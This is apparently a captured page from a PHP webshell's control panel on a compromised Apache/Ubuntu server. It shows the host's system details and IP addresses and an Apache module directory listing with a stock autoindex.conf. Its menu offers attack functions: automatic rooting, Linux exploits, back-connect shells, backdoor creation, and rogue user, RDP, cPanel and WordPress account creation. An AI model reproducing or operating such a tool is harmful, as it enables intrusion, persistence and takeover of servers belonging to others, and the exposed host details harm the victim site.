Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.144.1.94
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apache2 /
mods-enabled /
[ HOME SHELL ]
Name
Size
Permission
Action
access_compat.load
100
B
-rw-r--r--
alias.conf
843
B
-rw-r--r--
alias.load
62
B
-rw-r--r--
auth_basic.load
94
B
-rw-r--r--
authn_core.load
72
B
-rw-r--r--
authn_file.load
72
B
-rw-r--r--
authz_core.load
72
B
-rw-r--r--
authz_host.load
94
B
-rw-r--r--
authz_user.load
94
B
-rw-r--r--
autoindex.conf
3.29
KB
-rw-r--r--
autoindex.load
70
B
-rw-r--r--
deflate.conf
395
B
-rw-r--r--
deflate.load
84
B
-rw-r--r--
dir.conf
157
B
-rw-r--r--
dir.load
58
B
-rw-r--r--
env.load
58
B
-rw-r--r--
filter.load
64
B
-rw-r--r--
mime.conf
7.5
KB
-rw-r--r--
mime.load
60
B
-rw-r--r--
mpm_prefork.conf
571
B
-rw-r--r--
mpm_prefork.load
108
B
-rw-r--r--
negotiation.conf
724
B
-rw-r--r--
negotiation.load
74
B
-rw-r--r--
php7.4.conf
855
B
-rw-r--r--
php7.4.load
102
B
-rw-r--r--
reqtimeout.conf
1.16
KB
-rw-r--r--
reqtimeout.load
72
B
-rw-r--r--
rewrite.load
66
B
-rw-r--r--
setenvif.conf
1.25
KB
-rw-r--r--
setenvif.load
68
B
-rw-r--r--
socache_shmcb.load
78
B
-rw-r--r--
ssl.conf
3.04
KB
-rw-r--r--
ssl.load
97
B
-rw-r--r--
status.conf
749
B
-rw-r--r--
status.load
64
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoindex.conf
<IfModule mod_autoindex.c> # Directives controlling the display of server-generated directory listings. # # IndexOptions: Controls the appearance of server-generated directory # listings. # Remove/replace the "Charset=UTF-8" if you don't use UTF-8 for your filenames. IndexOptions FancyIndexing VersionSort HTMLTable NameWidth=* DescriptionWidth=* Charset=UTF-8 # # AddIcon* directives tell the server which icon to show for different # files or filename extensions. These are only displayed for # FancyIndexed directories. AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip x-bzip2 AddIconByType (TXT,/icons/text.gif) text/* AddIconByType (IMG,/icons/image2.gif) image/* AddIconByType (SND,/icons/sound2.gif) audio/* AddIconByType (VID,/icons/movie.gif) video/* AddIcon /icons/binary.gif .bin .exe AddIcon /icons/binhex.gif .hqx AddIcon /icons/tar.gif .tar AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip AddIcon /icons/a.gif .ps .ai .eps AddIcon /icons/layout.gif .html .shtml .htm .pdf AddIcon /icons/text.gif .txt AddIcon /icons/c.gif .c AddIcon /icons/p.gif .pl .py AddIcon /icons/f.gif .for AddIcon /icons/dvi.gif .dvi AddIcon /icons/uuencoded.gif .uu AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl AddIcon /icons/tex.gif .tex # It's a suffix rule, so simply matching "core" matches "score" as well ! AddIcon /icons/bomb.gif /core AddIcon (SND,/icons/sound2.gif) .ogg AddIcon (VID,/icons/movie.gif) .ogm AddIcon /icons/back.gif .. AddIcon /icons/hand.right.gif README AddIcon /icons/folder.gif ^^DIRECTORY^^ AddIcon /icons/blank.gif ^^BLANKICON^^ # Default icons for OpenDocument format AddIcon /icons/odf6odt-20x22.png .odt AddIcon /icons/odf6ods-20x22.png .ods AddIcon /icons/odf6odp-20x22.png .odp AddIcon /icons/odf6odg-20x22.png .odg AddIcon /icons/odf6odc-20x22.png .odc AddIcon /icons/odf6odf-20x22.png .odf AddIcon /icons/odf6odb-20x22.png .odb AddIcon /icons/odf6odi-20x22.png .odi AddIcon /icons/odf6odm-20x22.png .odm AddIcon /icons/odf6ott-20x22.png .ott AddIcon /icons/odf6ots-20x22.png .ots AddIcon /icons/odf6otp-20x22.png .otp AddIcon /icons/odf6otg-20x22.png .otg AddIcon /icons/odf6otc-20x22.png .otc AddIcon /icons/odf6otf-20x22.png .otf AddIcon /icons/odf6oti-20x22.png .oti AddIcon /icons/odf6oth-20x22.png .oth # # DefaultIcon is which icon to show for files which do not have an icon # explicitly set. DefaultIcon /icons/unknown.gif # # AddDescription allows you to place a short description after a file in # server-generated indexes. These are only displayed for FancyIndexed # directories. # Format: AddDescription "description" filename #AddDescription "GZIP compressed document" .gz #AddDescription "tar archive" .tar #AddDescription "GZIP compressed tar archive" .tgz # # ReadmeName is the name of the README file the server will look for by # default, and append to directory listings. # # HeaderName is the name of a file which should be prepended to # directory indexes ReadmeName README.html HeaderName HEADER.html # # IndexIgnore is a set of filenames which directory indexing should ignore # and not include in the listing. Shell-style wildcarding is permitted. IndexIgnore .??* *~ *# RCS CVS *,v *,t </IfModule> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Close